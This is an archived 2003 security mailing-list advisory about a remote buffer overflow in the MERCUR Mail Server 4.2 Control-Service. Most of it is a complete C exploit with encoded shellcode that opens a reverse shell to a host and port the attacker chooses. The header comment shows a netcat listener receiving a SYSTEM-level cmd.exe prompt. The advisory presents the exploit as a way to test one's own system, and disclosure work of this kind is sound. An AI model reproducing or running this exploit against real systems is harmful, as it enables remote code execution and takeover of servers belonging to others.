Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:5298
HistoryOct 28, 2003 - 12:00 a.m.

[NT] MERCUR Mail Server Control-Service Vulnerability (Exploit)

2003-10-2800:00:00
vulners.com
13

The following security advisory is sent to the securiteam mailing list, and can be found at
the SecuriTeam web site: http://www.securiteam.com

    • promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


MERCUR Mail Server Control-Service Vulnerability (Exploit)

SUMMARY

A vulnerability in MERCUR's Control-Service allows remote attackers to
overflow an internal buffer, causing it to execute arbitrary code. The
following exploit code can be used to test your system for the mentioned
vulnerability.

DETAILS

Vulnerable systems:

  • MERCUR version 4.2

By sending a command in the following format:
<260 bytes><EBP><EIP>

To MERCUR's Control-Service (listening port TCP 32000), it is possible to
cause the program to execute arbitrary code.

Exploit:
/*
mercrexp.c (7/16/2002)

./mercrexp 192.168.0.2 32000 192.168.1.2 3333

nc -l -p 3333

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

E:\WINNT\system32>

2c79cbe14ac7d0b8472d3f129fa1df55
([email protected])
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>

// CALL EBX; mcrctrl.exe@0x228e
#define EIP "\x8e\x2c\x40\x00"

// payload… dumped into remote memory as failed 'username'
// dark spyrit's shell, ripped from jill.c
unsigned char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90"
"\x90\x90\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95"
"\x40\xe2\xfa\x2d\x95\x95\x64\xe2\x14\xad\xd8\xcf\x05\x95"
"\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95\xc8\x1e\x40\x14"
"\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3"
"\xc2\xc4\x1e\xaa\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66"
"\x33\xe1\x9d\xcc\xca\x16\x52\x91\xd0\x77\x72\xcc\xca\xcb"
"\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6\x5c\xf3"
"\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95"
"\x96\x56\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d"
"\xe1\x94\x95\x95\xa6\x55\x39\x10\x55\xe0\x6c\xc7\xc3\x6a"
"\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95\x7d\xce\x94\x95"
"\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5"
"\x18\xd2\x85\xc5\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18"
"\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18\xd2\x89\xc5\x6a\xc2\x55"
"\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a\xc2\x51"
"\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2"
"\xcd\x14\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95"
"\x18\xd2\xe5\xc5\x18\xd2\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff"
"\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14\x78\xd5\x6b\x6a"
"\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45"
"\x1e\x7d\xc5\xfd\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a"
"\x10\x3f\x95\x95\x95\xa6\x55\xc5\xd5\xc5\xd5\xc5\x6a\xc2"
"\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d\xf3\x52"
"\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d"
"\x95\x94\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a"
"\xc2\x49\xa6\x5c\xc4\xc3\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2"
"\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15\xab\x95\xe1\xba"
"\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff"
"\x95\x6a\xa3\xc0\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05"
"\x05\x05\x05\x7e\x27\xff\x95\xfd\x95\x91\x95\x95\xc0\xc6"
"\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1\x09\xff"
"\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2"
"\x49\x7e\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc4\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e"
"\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6\xd4\xf1\xf1\xe7"
"\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95"
"\xd2\xf0\xe1\xc6\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa"
"\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xe7\xfa\xf6\xf0\xe6"
"\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1\xc5\xfc"
"\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6"
"\x95\xc2\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4"
"\xf1\xd3\xfc\xf9\xf0\x95\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed"
"\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95\xd6\xf9\xfa\xe6"
"\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6"
"\xfa\xf6\xfe\xf0\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6"
"\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb\xf0\xf6\xe1\x95\xe6\xf0"
"\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb\xf0\xed"
"\xf0\x95\x0a";

// fake user
unsigned char user[] = "\x78\x78\x78\x78\x0a";

// ebp/eip overwrite
unsigned char passwd[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x03\xde\x83\xc3\x02\xff\xd3\xc3\x10"EIP""
"\x0a";

main(char argc, char **argv){
int fd;
int bufsize = 1024;
int buffer = malloc(bufsize);
unsigned short int a_port;
unsigned long a_host;
struct sockaddr_in sin;
struct hostent *he;
struct in_addr in;

printf("MERCUR Mailserver 4.2.0.0 remote 'SYSTEM' level exploit
(07/16/2002)\n");
printf("2c79cbe14ac7d0b8472d3f129fa1df55
([email protected])\n\n");

  if &#40;argc &lt; 5&#41;{
       printf&#40;&quot;usage: &#37;s &lt;targethost&gt; &lt;controlport&gt; &lt;localhost&gt; 

<localport>\n", argv[0]);
printf(" controlport: MERCUR Control-Service port (default
32000)\n\n");
printf("NOTE: tested against win2k and winxp pro…\n\n");
exit(-1);
}

// riiiiiiip
a_port = htons(atoi(argv[4]));
a_port ^= 0x9595;
if ((he = gethostbyname(argv[3])) == 0){herror(argv[3]);exit(-1);}
a_host = *((unsigned long *)he->h_addr);
a_host ^= 0x95959595;
shell[1113] = ((a_port) & 0xff);
shell[1114] = ((a_port >> 8) & 0xff);
shell[1118] = ((a_host) & 0xff);
shell[1119] = ((a_host >> 8) & 0xff);
shell[1120] = ((a_host >> 16) & 0xff);
shell[1121] = ((a_host >> 24) & 0xff);

  if&#40;&#40;fd = socket&#40;AF_INET, SOCK_STREAM, IPPROTO_TCP&#41;&#41; &lt; 

0){perror("socket error");exit(-1);}

  if &#40;&#40;he = gethostbyname&#40;argv[1]&#41;&#41; != NULL&#41;{memcpy &#40;&in, he-&gt;h_addr, 

he->h_length);}
else
if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve
host");exit(-1);}

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = inet_addr&#40;inet_ntoa&#40;in&#41;&#41;;
  sin.sin_port = htons&#40;atoi&#40;argv[2]&#41;&#41;;

printf("ret: 0x00402c8e (mrcctrl.exe v.4.2.1.0)\n\n");

  printf&#40;&quot;connecting to tcp port &#37;s...&#92;n&quot;, argv[2]&#41;;
  if&#40;connect&#40;fd, &#40;struct sockaddr *&#41;&sin, sizeof&#40;sin&#41;&#41; &lt; 

0){perror("connection error");exit(-1);}

  printf&#40;&quot;connected.&#92;n&#92;n&quot;&#41;;

sleep(1);
printf("dumping payload…");
if(write(fd, shell, strlen(shell)) < strlen(shell)){perror("write
error");exit(-1);}
printf("done\n");
sleep(1);
printf("sending fake login…");
if(write(fd, user, strlen(user)) < strlen(user)){perror("write
error");exit(-1);}
printf("done\n");
sleep(1);
printf("eip overrun…");
if(write(fd, passwd, strlen(passwd)) < strlen(passwd)){perror("write
error");exit(-1);}
printf("done\n\n");

printf("cmd.exe spawned to [%s:%s]\n\n", argv[3], argv[4]);

  close&#40;fd&#41;;

}

ADDITIONAL INFORMATION

The information has been provided by Anonymous.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
[email protected]
In order to subscribe to the mailing list, simply forward this email to:
[email protected]

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages.